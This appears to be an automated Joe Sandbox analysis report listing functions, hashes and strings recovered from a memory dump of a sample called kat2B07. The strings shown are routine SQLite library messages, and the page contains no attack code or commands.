Opcode ID: 521a87ddc841eb239044749e5017708f1e71ae228251429684bf15d42403c0a6
Instruction ID: 166dcd56fd74f2640a8a4ac9e127b26e109d00af5b915bac8504f601661ab21b
Opcode Fuzzy Hash: 521a87ddc841eb239044749e5017708f1e71ae228251429684bf15d42403c0a6
Instruction Fuzzy Hash: 0B216A37A84212B6D72359629C88FBB27AC8BC62A5F85052CFD0C9610AF621D504C2A7

Function 1D85BF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

phrase, xrefs: 1D85C035, 1D85C042
NEAR, xrefs: 1D85C03A
fts5 expression tree is too large (maximum depth %d), xrefs: 1D85C070
fts5: %s queries are not supported (detail!=full), xrefs: 1D85C043

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
API String ID: 0-593389478
Opcode ID: e07c6f280c826389ccc45370c9c69503eafc72086f6b021c6c0c280424b6e428
Instruction ID: 8e051e0bb2b045969d026a12ec031f0ca30a6914c9091b6cb8de343e59e4af20
Opcode Fuzzy Hash: e07c6f280c826389ccc45370c9c69503eafc72086f6b021c6c0c280424b6e428
Instruction Fuzzy Hash: 8C41F2396042069FD715CE24D880B7AB3A5EF94324F11476EF94A4B221E776F845CF93

Function 1D7623D0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 150COMMON

Download Yara Rule

Strings

main, xrefs: 1D762491
cannot detach database %s, xrefs: 1D7624C3, 1D762547
no such database: %s, xrefs: 1D7624B4
database %s is locked, xrefs: 1D762541

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: cannot detach database %s$database %s is locked$main$no such database: %s
API String ID: 0-3838832555
Opcode ID: 8e8bb22f59832164a4b23b0f751e10ddc2ec5a8bb0f52e7af7910cb4a90fc104
Instruction ID: d7127b3a5a85a6de6ef90208129800853c53abdb4c09d782832f8ee07b74be50
Opcode Fuzzy Hash: 8e8bb22f59832164a4b23b0f751e10ddc2ec5a8bb0f52e7af7910cb4a90fc104
Instruction Fuzzy Hash: 5D519E756042019FE754CF05D8D0B2ABBA5FB85328F11855EED588B292EB31EC45CBB3

Function 1D77F490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

unable to delete/modify collation sequence due to active statements, xrefs: 1D77F533
misuse, xrefs: 1D77F4BA
%s at line %d of [%.10s], xrefs: 1D77F4BF
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D77F4B0

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 0-3348720253
Opcode ID: 886532b303e6d29ecd17e337850624b3e7f6ff9455cf40d7520faa316de52d14
Instruction ID: fc6b7006856c0947ceb2e061f6167e67f8098292364d30bd463c58409a7cc3ad
Opcode Fuzzy Hash: 886532b303e6d29ecd17e337850624b3e7f6ff9455cf40d7520faa316de52d14
Instruction Fuzzy Hash: F1411973608300ABDB008F18EC85B79F7E4EF81325F14496FF65887292E336E5158752

Function 1D764C00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN), xrefs: 1D764CCB
invalid arguments to fts4aux constructor, xrefs: 1D764C9E
temp, xrefs: 1D764C3E

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN)$invalid arguments to fts4aux constructor$temp
API String ID: 0-537686372
Opcode ID: 654f438c7af753c7167fdc307d4da0529fc719bb4e7257301ad3a371d7ccf998
Instruction ID: 5bfcad218396f6bcec7b0b2cff7d794ec4a58a597c0df1041e25abbb0473d7a5
Opcode Fuzzy Hash: 654f438c7af753c7167fdc307d4da0529fc719bb4e7257301ad3a371d7ccf998
Instruction Fuzzy Hash: 7D414835108245AFD7148F58DC80AB67BE6EF44239F1584AFED998B312E732E901CB72

Function 1D76E030 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D76E0F7, 1D76E12D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D76E0E8, 1D76E11E
database corruption, xrefs: 1D76E0F2, 1D76E128

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: ae704f898979ee5e79abe8dd0e72899a83cff51f15201d87a0fcc16de1856e19
Instruction ID: e23c403e9a3032d72f64c35484117b02a09c6106d609fad774bcc88a538116df
Opcode Fuzzy Hash: ae704f898979ee5e79abe8dd0e72899a83cff51f15201d87a0fcc16de1856e19
Instruction Fuzzy Hash: 7F41E2716043515AE304DE29DC80ABABBE0EB80226F84897EED9983642F325E558D773

Function 1D74C2B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

%!.*f, xrefs: 1D74C3AE

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %!.*f
API String ID: 0-786758813
Opcode ID: 0112fc5fcd276daa3a1f5fc72bf1e16f7c291b10f497e5dcf623329f1ad1a20d
Instruction ID: d40ae4fe647ce4ff0bbc4fc1ff27cf533ee9b48cd5ea89f9b32bad6bbd64aeed
Opcode Fuzzy Hash: 0112fc5fcd276daa3a1f5fc72bf1e16f7c291b10f497e5dcf623329f1ad1a20d
Instruction Fuzzy Hash: 88315C35C08E119AD3079E389C1226B77E46F822B5F25C366EC466B113EB35A496C2D3

Function 1D80EBD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D80EC51
CREATE , xrefs: 1D80EBFF
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D80EC42
database corruption, xrefs: 1D80EC4C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1360532505
Opcode ID: 27c2aa65cc7add0e59965473bd96dbb6281aaccc049224979320f9a89f05a300
Instruction ID: c8e9256d1c695d8344e22a9f13bbb4bee78a342d06f7a5e81744b5c55a16ac83
Opcode Fuzzy Hash: 27c2aa65cc7add0e59965473bd96dbb6281aaccc049224979320f9a89f05a300
Instruction Fuzzy Hash: E9312B625083C5A9D7124A5ADD40BB37BD5AF4121AF1840BFF9898E283E727D540C733

Function 1D767050 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON

Download Yara Rule

Strings

API call with %s database connection pointer, xrefs: 1D767074
bad parameter or other API misuse, xrefs: 1D767083
out of memory, xrefs: 1D767059, 1D7670A2
invalid, xrefs: 1D76706F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$bad parameter or other API misuse$invalid$out of memory
API String ID: 0-453588374
Opcode ID: d29043d22c8e74a1051db9c61b34bef970c447e1b3943007ae869642a821369d
Instruction ID: db052323379cabadf6a6a5dad9ab8c3e6bbc3814a3b99156174c1b5d70008dcf
Opcode Fuzzy Hash: d29043d22c8e74a1051db9c61b34bef970c447e1b3943007ae869642a821369d
Instruction Fuzzy Hash: 1A3149B190474093FF194624DC05BBBA3569BC06B5F6A801BEC498BA42F225E84783B3

Function 1D7E93A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D7E9455, 1D7E9499
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7E9446, 1D7E948A
database corruption, xrefs: 1D7E9450, 1D7E9494

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 55d254b4be094c599460e44f241227b9e860cb39f2200c8105ca851134b2ff13
Instruction ID: f5035a114773c17470a97ae3d6489fbae1bf9cfc01d248bef465c9d09c9eb2a5
Opcode Fuzzy Hash: 55d254b4be094c599460e44f241227b9e860cb39f2200c8105ca851134b2ff13
Instruction Fuzzy Hash: 44316E7A604B509BC324DF28D890AB3BBF29F85311F5084ADE6D64B757E332E841C752

Function 1D774F40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 91COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D774F71, 1D775002
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D774F62, 1D774FF3
database corruption, xrefs: 1D774F6C, 1D774FFD

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 4aff70db70698d3d4deceba07a4cbf931cb7e719ac6eb693cd0ab62b0a5dfe80
Instruction ID: c73c37115fddeb16e36ffe5fc7eecc235611446b79905ae18c176f197efc148e
Opcode Fuzzy Hash: 4aff70db70698d3d4deceba07a4cbf931cb7e719ac6eb693cd0ab62b0a5dfe80
Instruction Fuzzy Hash: AD3127762045516BC700DF29DD80BB6BBE0FF45326F0942AAF558CB683E325F960D7A2

Function 1D741C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

misuse, xrefs: 1D741D46
%s at line %d of [%.10s], xrefs: 1D741D4B
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D741D3C
unknown database: %s, xrefs: 1D741CBD

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
API String ID: 0-142545749
Opcode ID: a7a00d5428d2657afe9e9b8d687db9e3253cbccb55ffe0241e6eba3e666aa4a0
Instruction ID: 32cac092eab9ba0a7c02d439be94c9f787af51cfe53b5120728aaa26550f32e1
Opcode Fuzzy Hash: a7a00d5428d2657afe9e9b8d687db9e3253cbccb55ffe0241e6eba3e666aa4a0
Instruction Fuzzy Hash: E52149B5600740BBD712AE29EC44FA737A99FC1379F21462EFC6857242D330A50487B3

Function 1D773FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D77408C, 1D7740B7
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D77407D, 1D7740A8
database corruption, xrefs: 1D774087, 1D7740B2

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 58380f6bb459bda6999c2e428dccbb8c2e238153befde08533b3a8d2ff0228c2
Instruction ID: 539fe28472b11e126b2920d1f9027a4e1a5a9ed5610d7b7daaf2e39dc255cdce
Opcode Fuzzy Hash: 58380f6bb459bda6999c2e428dccbb8c2e238153befde08533b3a8d2ff0228c2
Instruction Fuzzy Hash: B021C4B7600221ABCB00EE18EC415FB7BD0EB84665F42447AFD94D7202E225E559C7E3

Function 1D7E9290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 1D7E92AB, 1D7E9339
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D7E929C, 1D7E932A
database corruption, xrefs: 1D7E92A6, 1D7E9334

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: f620d4845387477f57b81ea7869ff9801f7a9906d984a2080d1bc5f280344888
Instruction ID: 9c8a6b414d36e5f04c419f10c5f8af4e2409e4b0a75d4fa52541559ab887ee9e
Opcode Fuzzy Hash: f620d4845387477f57b81ea7869ff9801f7a9906d984a2080d1bc5f280344888
Instruction Fuzzy Hash: 52212C26544BA096C321DF28DC80AB3BFF19F55320F4544ADE6D687797F322F5818752

Function 1D86C6F0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

Strings

a CHECK constraint, xrefs: 1D86C714, 1D86C72B
an index, xrefs: 1D86C71D
a generated column, xrefs: 1D86C722
non-deterministic use of %s() in %s, xrefs: 1D86C732

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

